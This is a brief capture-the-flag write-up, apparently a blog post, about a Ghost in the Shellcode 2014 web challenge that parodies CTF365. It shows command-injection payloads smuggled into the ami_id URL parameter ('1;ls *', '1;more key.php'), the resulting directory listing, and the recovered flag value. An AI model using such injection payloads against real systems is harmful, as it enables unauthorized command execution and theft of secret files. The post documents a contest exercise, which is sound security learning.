This weekend we have 46 hours of hard ctf. Organization let tou play a ‘doom-style’ game that could be decompiled and must be pwned to achieve some missions.
This task is one of two web challenges, a parody of CTF365 (lol).Going to ctf247.2014.ghostintheshellcode.com. was pretty simple since we notice there was a command injection on one of the parameters (ami_id):

/ec2.php?utf8=✓&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

First we are going to see what files are available:

/ec2.php?utf8=✓&ami_id=1;ls *&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

16K -rw-r--r-- 1 0  16K Jan 19 16:24 index.html
4.0K -rw-r--r-- 1 0   86 Jan 19 15:27 key.php
4.0K -rw-r--r-- 1 0 2.5K Jan 18 21:16 ec2.php

ec2-api-tools-1.6.12.0:
total 104K
4.0K drwxr-xr-x 3 0 4.0K Jan 19 13:44 .
 36K drwxr-xr-x 2 0  36K Jan 19 13:44 bin
4.0K drwxr-xr-x 4 0 4.0K Jan 18 21:17 ..
 48K -rw-r--r-- 1 0  46K Jan 18 21:16 THIRDPARTYLICENSE.TXT
8.0K -rw-r--r-- 1 0 4.8K Jan 18 21:16 license.txt
4.0K -rw-r--r-- 1 0  539 Jan 18 21:16 notice.txt
 ... 
 ... 
 ...

So key.php have the flag, let’s dump it. I have place ami_id=2;cat%20key.php, but nothing happens (even viewing source code), so let’s use ‘more’

/ec2.php?utf8=✓&ami_id=1;more%20key.php&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server

Finally get the flag that was hidden as a comment:

flag: 0aea26e968895efa40b563e3e8fe8f19

Done :)